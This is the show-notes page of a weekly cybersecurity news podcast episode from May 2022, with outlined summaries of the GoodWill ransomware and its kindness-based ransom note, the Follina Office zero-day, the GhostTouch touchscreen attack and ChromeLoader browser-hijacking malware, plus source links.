CyberSecurity News Byte – Weekly

Hosted ByJim Guckin

A new podcast has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart with souls like mine.

Episode 20: May 31 2022

Ransomware demands acts of kindness to get your files back, Microsoft Office zero-day leaves researchers scrambling, Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely, Experts Warn of the rise in ChromeLoader Malware Hijacking Users’ Browsers

Bullet points of key topics + chapter markers
[00:36] Ransomware demands acts of kindness to get your files back
[09:05] Microsoft Office zero-day leaves researchers scrambling
[13:46] Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely
[18:32] Experts Warn of the rise in ChromeLoader Malware Hijacking Users’ Browsers

Links

Links

https://www.tripwire.com/state-of-security/security-data-protection/ransomware-demands-acts-of-kindness-to-get-your-files-back/

https://www.cybersecuritydive.com/news/microsoft-office-zero-day/624604/

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

https://thehackernews.com/2022/05/attackers-can-use-electromagnetic.html

https://thehackernews.com/2022/05/experts-warn-of-rise-in-chromeloader.html

NOTES

Ransomware demands acts of kindness to get your files back

  • GoodWill ransomware
    • security firm CloudSEK
    • isn’t interested in extorting money
    • to do something good for the world
  • Usual Tactic
    • encrypts the usual file types
      • documents
      • databases
      • photographs
      • videos  
    • Does not charge money for decryption key
      • Wants you do do something good
        • provide some video proof
  • Lock Screen
    • Our Aim The word “GoodWill” means to show kindness Story:- Team GoodWill is not hungry of Money and Wealth but kindness. We want to make every person on the planet to be kind and wants to give them a hard lesson to always help poor and needy people. So, all our victims need to be gentle and kind to get their files back. We know that you are very excited for the play. Take Deep breath and look all around for those who need help? You! No way, the only way to help yourself is to help others hope you understand
  • multi-page ransom note
    • three acts of goodwill
      • The first request is for you to donate new clothes and blankets to the homeless. Victims are told to make a video of them giving assistance to people sleeping rough, and to post it on their Facebook, Instagram, and WhatsApp to encourage others to help those in need.

      • The second requested act involves taking five poor children (under the age of 13) to Dominos, Pizza Hut, or KFC, and allowing them to order any food that they wish.
        • “Take some Selfies of them full of smiles and happy faces, Make a beautiful video story on this whole event and again post it on your Facebook and Instagram Stories with a photo frame and caption provided by us. Take a screenshot of your posts, snap of the restaurant’s bill and send an email to us with a valid post link, later our team will verify the whole case and promotes you for the next activity. Help those less fortunate than you, for it is real human existence.”
      • The final requested act of goodwill involves providing financial assistance to those who need urgent medical assistance, but cannot afford to pay for it themselves
        • Visit the nearest hospital in your area and observe the crowd around you inside the hospital premises. You will see that there will be some people who need a certain amount of money urgently for their medical treatment, but they are unable to arrange it due to any reason. You have to go near them and talk to them that they have been supported by you and they do not need to worry now, Finally Provide them maximum part of the required amount. Again, Take some Selfies of them full of smiles and happy faces, Record Audio while whole conversation between you and them and send it to us.
  • if you provide convincing evidence that you have done the good acts
    • they will provide a decryption tool
      • with key and video tutorial

Microsoft Office zero day leaves researchers scrambling

  • Dubbed “Follina”
    • Was discover on May 27th by Nao_Sec
    • CVE-2022-30190
    • all versions of Office 365 files when using an .RTF file
  • The attack can exploit the vector using Microsoft Office documents to open a Microsoft Diagnostics Tool (MSDT) file handler
    • After using phishing or social engineering to get users to open an attached file, an attacker could gain persistent access, move laterally and escalate user privileges to access inside of a system. 
    • used the external link in Word to load HTML and then executed a PowerShell code using “ms-msdt,”
  • Microsoft issued guidance on the vulnerability
    • can install programs, view, change or delete data or create new accounts in the context allowed by the user’s rights
    • No known patch so far
    • suggested disabling MSDT URL
    • Customers with Microsoft Defender Antivirus should turn on cloud-delivered protection and automatic-sample submission, Microsoft said. They use artificial intelligence and machine learning to identify and stop new and unknown threats, according to the company.

Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely

  • Called “GhostTouch”
    • Researchers have demonstrated
    • what they call the “first active contactless attack against capacitive touchscreens.”
    • “uses electromagnetic interference (EMI) to inject fake touchpoints into a touchscreen without the need to physically touch it,”
  • The idea is to take advantage of the electromagnetic signals to execute basic touch events
    • Like taps and swipes
      • into targeted locations of the touchscreen
    • works from a distance of up to 40mm
  • relies on the fact that capacitive touchscreens are sensitive to EMI
  • The attack involves an electrostatic gun
    • to generate a strong pulse signal that’s then sent to an antenna to transmit
    • uses the electromagnetic field on the phone’s touchscreen,
    • causes the electrodes
      • which act as antennas themselves
      • to pick up the EMI and treat it as a touch
    • by tweaking the signal and the antenna to induce a variety of touch behaviors, such as press and hold and swipe to select
  • “In places like a cafe, library, meeting room, or conference lobbies, people might place their smartphone face-down on the table,” the researchers said. “An attacker may embed the attacking equipment under the table and launch attacks remotely.”
  • Tested nine different smartphone models have been found vulnerable to GhostTouch,
    • Galaxy A10s
    • Huawei P30 Lite
    • Honor View 10
    • Galaxy S20 FE 5G
    • Nexus 5X
    • Redmi Note 9S
    • Nokia 7.2
    • Redmi 8
    • iPhone SE (2020)
  • Defense
    • researchers recommend adding electromagnetic shielding to block EMI
    • prompting users to enter the phone’s PIN or verify their faces or fingerprints prior to executing high-risk actions.

Experts warn of the rise in ChromeLoader Malware Hijacking Users’ Browsers

  • ChromeLoader
    • is a rogue Chrome browser extension
      • typically distributed in the form of ISO files via pay-per-install sites
      • baited social media posts that advertise QR codes to cracked video games and pirated movies.
      • the purpose is to get revenue via unsolicited advertisements and search engine hijacking
      • detected a macOS version of the malware that works against both Chrome and Safari browsers
    • The malvertising threat is witnessing a new surge in activity since its emergence earlier this year.
    • pervasive and persistent browser hijacker that modifies its victims’ browser settings and redirects user traffic to advertisement websites
  • primarily functions
    • hijacking user search queries to Google, Yahoo, and Bing and redirecting traffic to an advertising site
    • uses PowerShell to inject itself into the browser and get the extension added.
  • Trick up it sleeve
    • is its ability to redirect victims away from the Chrome extensions page (“chrome://extensions”) should they attempt to remove the add-on.

Leave a Reply

Your email address will not be published.